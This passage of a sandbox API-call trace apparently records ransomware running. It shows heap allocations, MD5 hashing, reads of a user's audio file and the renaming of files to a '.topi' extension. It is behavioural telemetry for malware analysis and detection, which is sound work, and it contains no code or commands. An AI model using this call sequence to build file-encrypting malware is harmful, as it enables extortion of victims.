Uuid=0x9ccfa48) returned 0x0 [0097.245] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0097.245] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0097.245] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0097.245] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.245] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0097.245] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x69b0) returned 0x99fb2d8 [0097.245] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0097.245] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0097.245] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0097.245] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0097.245] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0097.245] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0097.245] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a03320 [0097.245] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4d00 [0097.245] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a03368 [0097.245] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4d18 [0097.245] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4d48 [0097.245] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0097.245] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4d60 [0097.245] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0097.245] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0097.246] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0097.246] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x9a04420 [0097.246] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4d48 | out: hHeap=0x680000) returned 1 [0097.246] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4d60 | out: hHeap=0x680000) returned 1 [0097.246] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0097.246] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0097.246] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0097.246] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0097.246] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e958 [0097.246] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4d60 [0097.246] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314df08 [0097.246] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99e4d48 [0097.246] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e998 [0097.246] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0097.246] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0097.246] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0097.246] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0097.246] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0097.246] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0097.246] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0097.246] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0097.246] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4d60 | out: hHeap=0x680000) returned 1 [0097.246] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0097.247] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4d48 | out: hHeap=0x680000) returned 1 [0097.247] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0097.247] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0097.247] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0097.247] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0097.247] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0097.247] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0097.247] GetCurrentThreadId () returned 0x8c4 [0097.247] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0097.247] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f9410 [0097.247] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0097.247] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df448 [0097.247] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0097.247] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0097.247] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0097.247] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0097.247] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.247] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.247] GetCurrentThreadId () returned 0x8c4 [0097.247] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.247] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.247] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x9a03438 [0097.247] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.247] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.248] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.248] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.248] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03438 | out: hHeap=0x680000) returned 1 [0097.248] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0097.248] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0097.248] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0097.248] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0097.248] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0097.248] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0097.248] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0097.248] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0097.248] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0097.248] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0097.248] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0097.248] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0097.248] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0097.248] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0097.248] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0097.248] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4d48 [0097.248] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0097.248] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e968 [0097.248] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0097.248] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0097.248] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0097.248] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0097.249] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0097.249] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4d60 [0097.249] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\FyEWgj\\2 g1mb.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\44m5ak\\fyewgj\\2 g1mb.wav"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\FyEWgj\\2 g1mb.wav.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\44m5ak\\fyewgj\\2 g1mb.wav.topi")) returned 1 [0097.251] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\FyEWgj\\AHntfyKO.wav") returned=".wav" [0097.251] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\FyEWgj\\AHntfyKO.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\44m5ak\\fyewgj\\ahntfyko.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0097.251] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=65519) returned 1 [0097.251] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0097.254] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0xffc9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.254] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0097.255] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0097.255] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df448) returned 1 [0097.256] CryptCreateHash (in: hProv=0x6df448, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0097.256] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0097.256] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0097.256] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0097.256] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0097.256] GetLastError () returned 0x0 [0097.256] CryptDestroyHash (hHash=0x31c7580) returned 1 [0097.256] CryptReleaseContext (hProv=0x6df448, dwFlags=0x0) returned 1 [0097.256] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0097.257] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0097.257] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0097.257] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0097.257] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0097.257] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.257] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0097.257] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xfff0) returned 0x9a06a00 [0097.257] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0097.257] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0097.257] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0097.257] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0097.257] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0097.257] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0097.257] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a03368 [0097.257] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4d18 [0097.257] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x9a033b0 [0097.257] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4d30 [0097.257] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4d60 [0097.257] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0097.257] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4d78 [0097.257] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0097.258] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0097.258] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0097.258] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x9a04420 [0097.258] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4d60 | out: hHeap=0x680000) returned 1 [0097.258] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4d78 | out: hHeap=0x680000) returned 1 [0097.258] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0097.258] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0097.258] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0097.258] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0097.258] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e948 [0097.258] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4d78 [0097.258] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314d0a8 [0097.258] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99e4d60 [0097.258] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9c8 [0097.258] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0097.258] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0097.258] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0097.258] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0097.258] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0097.258] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0097.258] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0097.258] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0097.258] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4d78 | out: hHeap=0x680000) returned 1 [0097.258] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0097.258] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4d60 | out: hHeap=0x680000) returned 1 [0097.258] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0097.259] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0097.259] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0097.259] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0097.259] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0097.259] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0097.259] GetCurrentThreadId () returned 0x8c4 [0097.259] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0097.259] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f94a0 [0097.259] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0097.259] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df448 [0097.259] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0097.259] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0097.259] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0097.259] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0097.259] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.259] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.259] GetCurrentThreadId () returned 0x8c4 [0097.259] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.259] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.259] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x9a03438 [0097.259] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.259] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.259] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.259] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.259] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03438 | out: hHeap=0x680000) returned 1 [0097.259] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0097.259] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0097.259] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0097.259] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0097.259] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99df068 [0097.259] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0097.259] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0097.260] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0097.260] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0097.260] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0097.260] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0097.260] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0097.260] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0097.260] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0097.260] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0097.260] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4d60 [0097.260] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0097.260] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e918 [0097.260] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0097.260] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0097.260] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0097.260] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0097.260] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0097.260] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4d78 [0097.260] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0097.260] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0097.260] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0097.260] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4d48 [0097.260] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0097.260] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0097.260] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0097.260] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0097.260] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0097.260] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0097.261] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0097.261] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4d90 [0097.261] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0097.261] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e49d0 [0097.261] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0097.261] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9b8 [0097.261] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0097.261] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0097.261] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0097.261] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0097.261] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4d60 | out: hHeap=0x680000) returned 1 [0097.261] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4d60 [0097.261] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0097.261] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e9300 [0097.261] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0097.261] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0097.261] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0097.261] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9528 [0097.261] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0097.261] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0097.261] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0097.261] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0097.261] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4d60 | out: hHeap=0x680000) returned 1 [0097.261] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0097.261] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0097.262] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0097.262] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0097.262] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df448 | out: hHeap=0x680000) returned 1 [0097.262] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0097.262] 